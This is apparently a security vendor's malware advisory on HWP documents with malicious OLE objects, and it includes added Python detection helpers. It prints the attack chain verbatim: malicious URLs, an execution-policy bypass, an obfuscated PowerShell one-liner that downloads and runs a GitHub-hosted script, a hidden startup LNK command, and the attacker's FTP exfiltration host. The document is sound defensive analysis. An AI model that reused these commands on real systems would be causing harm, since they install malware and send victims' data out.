Warning Against HWP Documents Embedded with Malicious OLE Objects
AhnLab Security Emergency response Center (ASEC) found HWP documents that were embedded with OLE objects, targeting individuals in specific sectors such as the national defense and the press. The malware is presumed to be distributed mainly through download URLs or attachments in emails. The file names of the distributed documents are relevant to the areas of national defense, unification, education, and broadcasting, suggesting that the malware targets professionals involved in these areas.
The HWP documents analyzed in this post largely fall into two types: one that connects to an external URL and one that creates an additional script file. [Type 2] has a similar operation method to the malware covered in a previous post [1] and also uses the same FTP server password. Such similarities allow us to believe that they were made by the same person.
The figure below shows a brief flow of operations of each type.

<Type 1>
This type accesses an external URL through an OLE object embedded in the HWP documents. Below are the file names of HWP documents presumed to be this type.
| Date | File name |
|---|---|
| May 25, 2023 | Unification** cue sheet May 29 Mon.hwp |
| May 25, 2023 | 20230508_ProfessorMeetingMaterial_NewTemplate.hwp |
| May 25, 2023 | (***)2023-05-30 Material for Professor Meeting.hwp |
| May 30, 2023 | Payment Receipt (Chief ***).hwp |
| May 30, 2023 | (Template)Payment Receipt_Congratulatory and Condolence Money.hwp |
| June 22, 2023 | 20230512_MyungbakScenario_Details.hwp |
| June 22, 2023 | 1-1.Installation of a Separate Service for Research Support Within the Overseeing Organization (** University Graduate School Academic-Industry Cooperation Center).hwp |
| June 22, 2023 | Reference Material for School President for the Honorary Doctorate Awarding Ceremony of Former Prime Minister Hu** ***.hwp |
| June 23, 2023 | [Faculty Training Department-489 (Attached)] [Attachment 3] Lecturer Card (Template).hwp |
| June 29, 2023 | National Defense and Protection Sacrificed to Political Disputes.hwp |
| July 11, 2023 | ** Unification April 30 2023 (Sun).hwp |
| July 17, 2023 | Special The Agricultural Industry and Quality of Life of North Korea ** Cho.hwp |
| July 20, 2023 | 42- Wagner’s Lesson (Aug 2023).hwp |
| July 24, 2023 | [Template1] Business Budget Issue Request.hwp |
| Aug 14, 2023 | Dissertation Evaluation (** Kwon).hwp |
| Sep 01, 2023 | Evidentiary Documents of Incentive Payment.hwp |
| Sep 04, 2023 | ** Unification Sep 06 Final Wednesday.hwp |
| Sep 06, 2023 | ** Kim_Statement of Honorarium Payment.hwp |
| Sep 19, 2023 | [Template_Attachment 5]_Recommender_Certificate_Template-** Jeon.hwp |

Table 1. Identified HWP document file names
The HWP documents identified in Table 1 contain text that prompts the user to click the OLE object for it to run.


In the documents, the threat actor embedded an OLE object the size of which exceeds the page boundaries (see Figure 3), so that the OLE object runs no matter where the user clicks.

The embedded OLE object includes over 5 MB of dummy bytes and a malicious URL. Accordingly, when the user clicks the OLE object, an attempt is made to connect to the malicious URL contained within the object.


At the time of analysis, the URL was no longer available, so no follow-on behavior could be observed. The malicious URLs identified so far are listed below. Each document carries a different parameter value, which suggests that the documents are being distributed to specific individuals.
- hxxp://host.sharingdocument[.]one/dashboard/explore/starred?hwpview=[specific value]
- hxxp://mail.smartprivacyc[.]com/get/account/view?myact=[specific value]
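A detection heuristic a defender could apply to Type 1 objects, written here as an added example and not taken from the ASEC post: it takes the raw bytes of one HWP BinData stream (in a real sample these would be read from the document's compound-file container with a library such as olefile, which is not shown), inflates it, and flags objects that are both oversized and contain a URL, also reporting how much of the object is padding. The 5 MB threshold, the sample URL under `example.invalid`, and the assumption that BinData streams are raw-deflate compressed are mine.

```python
import re
import zlib
from collections import Counter

# Size above which an embedded object is treated as suspicious. The report
# describes objects padded with over 5 MB of dummy bytes; the threshold is an
# assumption, not a value from the post.
SIZE_THRESHOLD = 5 * 1024 * 1024
URL_RE = re.compile(rb"https?://[A-Za-z0-9._~:/?#\[\]@!$&'()*+,;=%-]+", re.IGNORECASE)


def inflate_bindata(raw: bytes) -> bytes:
    """Decompress an HWP BinData stream.

    Assumption: HWP 5.x stores these streams as raw deflate (wbits=-15).
    Fall back to a zlib-wrapped stream, and finally to the bytes as-is.
    """
    for wbits in (-15, 15):
        try:
            return zlib.decompress(raw, wbits)
        except zlib.error:
            continue
    return raw


def padding_ratio(data: bytes, sample: int = 1 << 20) -> float:
    """Fraction of the first `sample` bytes made up of the single most common
    byte value. Dummy padding pushes this close to 1.0."""
    view = data[:sample]
    if not view:
        return 0.0
    (_, count), = Counter(view).most_common(1)
    return count / len(view)


def inspect_ole_object(raw_stream: bytes) -> dict:
    """Inflate one BinData stream and report size, padding and embedded URLs."""
    data = inflate_bindata(raw_stream)
    urls = [u.decode("ascii", "replace") for u in URL_RE.findall(data)]
    oversized = len(data) > SIZE_THRESHOLD
    return {
        "size": len(data),
        "oversized": oversized,
        "padding_ratio": round(padding_ratio(data), 3),
        "urls": urls,
        # An oversized object that carries a URL is the pattern described for Type 1.
        "suspicious": oversized and bool(urls),
    }


def build_sample_stream() -> bytes:
    """Constructed stand-in for a malicious BinData stream: about 6 MB of dummy
    bytes with a defanged sample URL in the middle, raw-deflate compressed."""
    url = b"http://host.example.invalid/dashboard/explore/starred?hwpview=SAMPLE"
    payload = b"\x00" * (3 * 1024 * 1024) + url + b"\x00" * (3 * 1024 * 1024)
    comp = zlib.compressobj(wbits=-15)
    return comp.compress(payload) + comp.flush()


if __name__ == "__main__":
    print(inspect_ole_object(build_sample_stream()))
```

On a real document, run `inspect_ole_object` over every stream under the `BinData` storage; a benign embedded object is rarely larger than a few hundred kilobytes, and one that is almost entirely a single byte value and still carries a URL is the shape this campaign used.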
<Type 2>
This type has a malicious script file embedded in the HWP document and ultimately executes additional script code hosted on GitHub. Below are the file names of HWP documents presumed to be this type.
| Date | File name |
|---|---|
| July 31, 2023 | test.hwp |
| July 27, 2023 | Honorarium Information_aa.hwp |
| Aug 31, 2023 | Consultation Request.hwp |
| Sep 01, 2023 | Honorarium Template.hwp |
| Sep 14, 2023 | main.hwp |
| Oct 04, 2023 | test1.hwp |
| Oct 04, 2023 | cna[q].hwp |

Table 2. Identified HWP document file names
The document “test1.hwp” listed in Table 2 contains two file attachments and an embedded hyperlink that executes the corresponding script file (zz.bat).

When the HWP document is executed, the files zz.bat and oz.txt are created in the %temp% folder. When the user clicks on a blank area containing the embedded hyperlink or the zz.bat file icon, zz.bat is executed.
zz.bat contains PowerShell commands that download and execute additional data by connecting to a GitHub address inside oz.txt.


Thus, when zz.bat is executed, it ultimately connects to hxxps://raw.githubusercontent[.]com/babaramam/repo/main/pq.txt and executes a malicious script.


The files down.txt, info.txt, and upload.txt seen in Figure 10 each hold obfuscated data. When the script connects to the corresponding URLs, the data is deobfuscated with a fixed key value and then executed.
The PowerShell script uploaded to hxxps://raw.githubusercontent[.]com/babaramam/repo/main/pq.txt contains four functions. Brief descriptions of each function’s features are given below.
| Function Name | Feature |
|---|---|
| mainFunc | Changes the PowerShell execution policy, then executes the other functions in the order getinfo – uploadResult – downCommand |
| getinfo | Executes the script uploaded to hxxps://raw.githubusercontent[.]com/babaramam/repo/main/info.txt; collects user PC information such as network configuration |
| uploadResult | Executes the script uploaded to hxxps://raw.githubusercontent[.]com/babaramam/repo/main/upload.txt; uploads the collected information to the threat actor’s FTP server |
| downCommand | Executes the script uploaded to hxxps://raw.githubusercontent[.]com/babaramam/repo/main/down.txt; creates additional malicious files |

Table 3. Features of each function
The function mainFunc, which is executed first, changes the current user’s PowerShell execution policy with the following command so that the PowerShell scripts downloaded later on are allowed to run.
- Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Bypass -Force

The function getinfo executes an obfuscated script uploaded to hxxps://raw.githubusercontent[.]com/babaramam/repo/main/info.txt.
The deobfuscated info.txt script is responsible for collecting user information. The collected pieces of information are stored in the file %APPDATA%\Ahnlab\Ahnlab.hwp.

The table below shows the collected pieces of information.
| Command | Collected Information |
|---|---|
| Get-ChildItem ([Environment]::GetFolderPath("Recent")) | List of recently used files |
| ipconfig /all | List of network configurations |
| Get-Process | List of processes |

Table 4. Collected information

The function uploadResult also executes an obfuscated script uploaded to hxxps://raw.githubusercontent[.]com/babaramam/repo/main/upload.txt.
The deobfuscated upload.txt script sends the file containing the collected pieces of information (%APPDATA%\Ahnlab\Ahnlab.hwp) to the threat actor before deleting it. The threat actor used FTP to collect the exfiltrated data.

- Address: plm.myartsonline[.]com
- User name: 4154836
The function downCommand, which is executed next, runs an obfuscated script uploaded to hxxps://raw.githubusercontent[.]com/babaramam/repo/main/down.txt.
The script down.txt creates an additional malicious file for the malware to maintain persistence. To enable the malicious script to be executed continuously, the threat actor creates an LNK file in the Startup folder.

The created LNK file contains a command that executes the file thumbs.log.
thumbs.log contains a PowerShell command which executes the script uploaded to hxxps://raw.githubusercontent[.]com/babaramam/repo/main/pq.txt.
Thus, whenever the user restarts the PC, the script uploaded to hxxps://raw.githubusercontent[.]com/babaramam/repo/main/pq.txt is run.
- LNK file command
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -command &{[string]$x= [IO.File]::ReadAllText('C:\Users\[user]\AppData\Roaming\Microsoft\Windows\thumbs.log');invoke-expression $x}
- thumbs.log data
  [string]$a = {(New-Object Net.WebClient).Doqwertyutring('hxxps://raw.githubusercontent[.]com/babaramam/repo/main/pq.txt')};$b=$a.replace('qwertyu','wnloadS');$c=iex $b;invoke-expression $c
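The thumbs.log stage above hides the `DownloadString` call by splitting it with a `.replace('qwertyu','wnloadS')` step, which defeats detections that look for the literal API name. The triage helper below is an added example, not code from the ASEC post: it resolves that string-replace trick by applying every `.replace()` pair found in a command line to the command text itself, then checks the normalized text for the indicators this chain exhibits (the hidden-window PowerShell launch from the LNK file, the execution-policy change made by mainFunc, reading a script from the Roaming profile, the GitHub raw URL, and `invoke-expression`/`iex`). The sample command lines are constructed from the ones quoted in the post with the URL kept defanged; the indicator names and the benign control command are mine.

```python
import re

# $var.replace('old','new') with either quote style; quotes are normalized first.
REPLACE_RE = re.compile(
    r"\.replace\(\s*['\"]([^'\"]*)['\"]\s*,\s*['\"]([^'\"]*)['\"]\s*\)", re.IGNORECASE
)

# Indicators drawn from the chain described in the post (names are mine).
INDICATORS = {
    "download_string": re.compile(r"DownloadString", re.I),
    "invoke_expression": re.compile(r"\b(invoke-expression|iex)\b", re.I),
    "hidden_window": re.compile(r"-WindowStyle\s+Hidden", re.I),
    "policy_bypass": re.compile(r"Set-ExecutionPolicy.*-ExecutionPolicy\s+Bypass", re.I),
    "reads_roaming_file": re.compile(r"ReadAllText\(.*AppData\\Roaming", re.I),
    "github_raw": re.compile(r"raw\.githubusercontent", re.I),
}


def normalize(cmd: str) -> str:
    """Undo the string-replace obfuscation.

    Curly quotes (common in copied samples) become straight quotes, the
    defanged '[.]' becomes '.', and every .replace('x','y') pair found in the
    command is applied to the whole command text, so a split API name such as
    'Doqwertyutring' collapses back to 'DownloadString'.
    """
    text = cmd.replace("\u2018", "'").replace("\u2019", "'").replace("[.]", ".")
    for old, new in REPLACE_RE.findall(text):
        if old:
            text = text.replace(old, new)
    return text


def score(cmd: str) -> list:
    """Return the sorted indicator names present after normalization."""
    norm = normalize(cmd)
    return sorted(name for name, rx in INDICATORS.items() if rx.search(norm))


# Constructed samples, based on the command lines quoted in the post.
LNK_COMMAND = (
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden "
    r"-command &{[string]$x= [IO.File]::ReadAllText('C:\Users\[user]\AppData\Roaming"
    r"\Microsoft\Windows\thumbs.log');invoke-expression $x}"
)
THUMBS_LOG = (
    "[string]$a = {(New-Object Net.WebClient).Doqwertyutring("
    "'hxxps://raw.githubusercontent[.]com/babaramam/repo/main/pq.txt')};"
    "$b=$a.replace('qwertyu','wnloadS');$c=iex $b;invoke-expression $c"
)
POLICY_CMD = "Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Bypass -Force"
BENIGN = "Get-ChildItem C:\\Users\\alice\\Documents | Measure-Object"


def triage(samples: dict) -> dict:
    """Score a batch of {label: command line} and keep only the hits."""
    return {label: hits for label, cmd in samples.items() if (hits := score(cmd))}


if __name__ == "__main__":
    for label, hits in triage(
        {"lnk": LNK_COMMAND, "thumbs.log": THUMBS_LOG, "policy": POLICY_CMD, "benign": BENIGN}
    ).items():
        print(f"{label}: {', '.join(hits)}")
```

Feeding process-creation or Script Block logging events through `score` works the same way; the point of `normalize` is that a rule for `DownloadString` only fires on this sample after the replace step has been resolved, so the replace-resolution has to happen before matching, not after.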
While no additional malicious behaviors aside from collecting user information have been observed, a variety of malicious behaviors can be performed depending on the command uploaded to hxxps://raw.githubusercontent[.]com/babaramam/repo/main/pq.txt.
Since the malware from the June post [2] is also distributed through HWP documents, multiple malicious HWP documents are currently in circulation. When opening an HWP document, users must pay attention to its author and the sender.
[File Detection]
Downloader/HWP.Agent (2023.06.27.00)
Downloader/HWP.Generic (2023.08.16.03)
Dropper/HWP.Generic (2023.10.18.02)
Downloader/PowerShell.Agent (2023.10.19.00)
Downloader/BAT.Agent (2023.10.19.00)
Trojan/LNK.Runner (2023.10.18.03)
Downloader/PowerShell.Generic (2023.10.18.03)
Trojan/PowerShell.Agent (2023.10.18.03)
Data/BIN.Encoded (2023.10.26.02)